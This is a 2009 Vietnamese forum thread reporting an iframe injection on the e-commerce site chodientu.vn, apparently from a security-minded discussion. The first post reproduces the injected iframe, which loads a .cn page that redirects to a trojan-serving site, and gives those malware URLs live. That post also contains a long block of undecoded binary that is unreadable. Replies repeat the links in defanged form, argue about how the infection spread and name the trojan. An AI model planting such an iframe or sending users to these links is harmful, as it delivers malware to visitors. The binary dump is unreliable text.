PDA

View Full Version : Website chodientu.vn bị hack bởi hacker Trung Quốc



thuan1506
06-01-2009, 21:00
Lúc 20h20 ngày 6 tháng 1 năm 2009.Sau khi nghe bác rexh nói...Vào 4rum hok được, có chiện gì đó...Mình đã vào test và phát hiện lỗi là do đoạn script trong phần quảng cáo do bên widget.chodientu.vn gây ra !!!

Tại vì mình mới cài win nên chưa có font Trung Quốc.
Lưu ý: nếu bạn không bít về virus vui lòng đừng vào những link dưới.Mình hok chịu trách nhiệm nhé!!!Nên bật KAV lên...
http://www.uitstudent.com/forum/attachment.php?attachmentid=785&stc=1&d=1231249939

<iframe src= http://www.zghncsv.cn/jzll/21.htm? width=50 height=0 border=0></iframe>‹������åWËrE];_qÓTl¥’yi¬GÆ¥Ù!c‡D °RµfZ£NæÅtdC±Ê‚b—,³¢RÅ‚¢²€ �µŒ‹ÿПp{fdË‚Â#`R?ïãô9wzÖÖÖ:ç � �{ýOnïÀXF!ܾw}÷VˆfÙ=ÃØîoÃÇ7ûì‚ � ��ÐÏh,¸äILCÃØÙ#@ÆR¦ŽaL§S}jëIý;Æ ²e ©ÍUS“K;u_ú¤{n
«ÉªÅ¨_¶"&)(³û4ç—ô’X²XjýÔðÊ žK$;†2°Þ˜f‚I7—#­MÀ(
y2¸«Zì Qù=¯iê_/–Xðùj‚Æ°êéÁjRÓʵF±¨2ée<•Ë6� � -GKÓ�šA@ß7!Á…Z­ÀH8\üÄË#_*8ô4Kdâ%á E¸
¥j½aêœ3 “‹[åªKÓŒKVËc&<š²¹`÷ª0Eæ¹.†s©ò$I2� �iJî ÝK"# ú±Q&·±’ÜÆ{
e;äbH§úãø�¥4`È&ï!Ë£A@¥>˜¬†jäÞ5� �¶6Íz£¡Ù')/ïÒ<ær›JZûíi©·qdÂÙ´¶lÙ+H×&þawM?Ÿ O 8s—L¹/ÇNËFNlÁ
Y’ǾïÜ(L2ŸeŽ•€HBîŸÎ¤IIx'c!õ„m !b—xxn,[�²ìpÌx0–ŽÕ~™ÃrÓ™ OÉkYj’)ÉœÓ8¨ïó8Ðd’:¶š_„l$ÂQaaD# :p-ã4D?TaÆFî‚}ÔGšŒŸcð¹>‰ÉÂÿY¤ûaä| ö=ôÆóÙ7Ǐù|öeÜŸÏ~ÐïïuZÅo`‹ü— �Бtˆª-€w "O*ˆ]b¢øYŠ”zþI¿JGõ»™uvü…‘úfg–�‹h ðØi¨ÔIµâX…ÇÖ*˜ËÐÈ\†›,œ0T
½«š&XÆG˜7¬"†þ‘Óg@S(H¦ãôjž…®e²� �ÖÈnÑQ‹²Ö&ŽìQ«Õn4¬ÑÐ6‡æzÊ}·ÝÞ ¼Òn¬£mÄ!çRÈÜWÒGՐ˜
Ö>2†4~ˆ™ò((¤¿ƒG¨‚_Gá£vÊ9a`‰„aV }P7Íö t80õ€Œä¬�|é,*.+ÔÈYdµ¬ ±ÂWcuèo6à…T—”e•À¦ÙlšfE ŸyIVTh'NbFº‘AŽ“ùÑ3>‡ã'óÙÓ8€½ý÷ o]ƒ¦m™\åÚf‹WbÏŠ»xVx†§f¨‘îjªêA �\Réٍ'¿:›7L|–ïòϸbš:öáþÞñc î_T
”>êæ?&šfÝjYoB4V%šÂá¿C4¯Í_M©Œ†"Þ õ0gðÖÊÃÒ[F ç`íMh“úǨ`)¬õÇÝ3ÖB'“äªçK/v}šœ
Ë,ý®Ó(ÝÂÁ\ÁÂÑ¢EîÆ1ËžtË
âµu¸¬4«^o6íö•z³êoPX)°ÿ
Hiện đã bắt dc virus và code
°¿'bÛVWÅ—½ùæGßæ PÀ—ދŸàÇ°[äqVÒêÎ÷xó£ïb\{ïî6ñm‰Z|ñ#¾9ç³G 泯[ÏsØ¥)^Jawgoÿþ>ܵ Trang chợ điện tử đã bị nhúng iframe dẫn tới
http://www.zghncsv.cn/jzll/21.htm

Sau khi bạn vào trang trên bạn sẽ thấy nó dẫn tới trang thứ 2 là
http://www.jym562.cn/a76/fxx.htm
Trong trang này bạn sẽ có thể bị tải 1 số trojan về
Xem thêm tại http://uitstudent.com/forum/showthread.php?p=17341

voke
06-01-2009, 21:41
hack đâu mà hack !
có thấy gì đâu nào ......

bingbongsong
06-01-2009, 21:47
có thấy gì đâu trời?

thuan1506
06-01-2009, 21:53
K thấy nó hack cái homepage đó hả,click vào cái link tui gửi thì bít.Nó nhúng iframe vào,dịch thuật ngữ mới ra

CounterStrike
06-01-2009, 22:29
Hiện đã bắt dc virus và code
°¿'bÛVWÅ—½ùæGßæ PÀ—ދŸàÇ°[äqVÒêÎ÷xó£ïb\{ïî6ñm‰Z|ñ#¾9ç³G 泯[ÏsØ¥)^Jawgoÿþ>ܵ Trang chợ điện tử đã bị nhúng iframe dẫn tới
hxxp://www.zghncsv.cn/jzll/21.htm

Sau khi bạn vào trang trên bạn sẽ thấy nó dẫn tới trang thứ 2 là
hxxp://www.jym562.cn/a76/fxx.htm
Trong trang này bạn sẽ có thể bị tải 1 số trojan về
Xem thêm tại hxxp://uitstudent.com/forum/showthread.php?p=17341

sao ko vô hiệu link, mấy trang đó ko đùa được đâu !!!

thuan1506
06-01-2009, 22:37
sao ko vô hiệu link, mấy trang đó ko đùa được đâu !!!

Để các bạn vọc,link vẫn còn khá nhiều virus,đã có cách diệt dành cho người muốn vọc http://uitstudent.com/forum/showthread.php?p=17347

thaidesign
08-01-2009, 23:23
http://chiase.anhso.net/as/09/01/08/ddth764864.jpg

...

huongle078
09-01-2009, 11:29
Em vào có thấy j đâu???

superthin
09-01-2009, 15:57
Nãy giờ tui bấm chuột tá lả, có thấy con virus nào đâu nhỉ? Toàn tung tin vịt không àh. Có lẽ virus nó khóc ròng khi tui chạy Safari on Ubuntu rồi thì phải, nói chung là không có gì đáng ngại.

luanth
09-01-2009, 16:22
Cái này thường là do bên VDC hoặc FPT trong hệ thống server có máy bị nhiễm virus rồi nó lan ra trong nội bộ... Con này dùng cách chèn iframe vào dữ liệu ra, làm trình duyệt không hiển thị được nội dung trang gốc, mà mở một trang khác, có thể chứa mã độc, gây nguy hiểm cho pc người đang truy cập. Khi phát hiện thì phía VDC sẽ khoanh vùng, quét sạch hệ thống là xong. Thành thử có người thấy mà sau đó không còn nữa là như vậy... Đa phần loại virus [worm] này xuất phát từ Trunng Cuuả, đuôi .cn!

caonho
09-01-2009, 16:35
Cái này thường là do bên VDC hoặc FPT trong hệ thống server có máy bị nhiễm virus rồi nó lan ra trong nội bộ... Con này dùng cách chèn iframe vào dữ liệu ra, làm trình duyệt không hiển thị được nội dung trang gốc, mà mở một trang khác, có thể chứa mã độc, gây nguy hiểm cho pc người đang truy cập. Khi phát hiện thì phía VDC sẽ khoanh vùng, quét sạch hệ thống là xong. Thành thử có người thấy mà sau đó không còn nữa là như vậy... Đa phần loại virus [worm] này xuất phát từ Trunng Cuuả, đuôi .cn!

Ông phán pro gúm nhỉ? DataCenter mà ông bảo virus lây nhiễm 1 máy lan ra nội bộ à? Trừ khi xài chung server. Dedicated server làm gì có cửa cho ông viết virus lây qua máy khác trong cái datacenter đó. Mà chợ điện tử chả lẻ xài chung host à.

Ghostcomputerpro
22-01-2009, 11:50
Vào các link trên thấy có một loại Trojan nguy hiểm đó là: Trojan-Downloader.JS.Agent.djd. Nên cẩn thận với loại trojan này vì nó rất nguy hiểm. Ai chưa có kiến thức về malware thì không nên vào các link trên.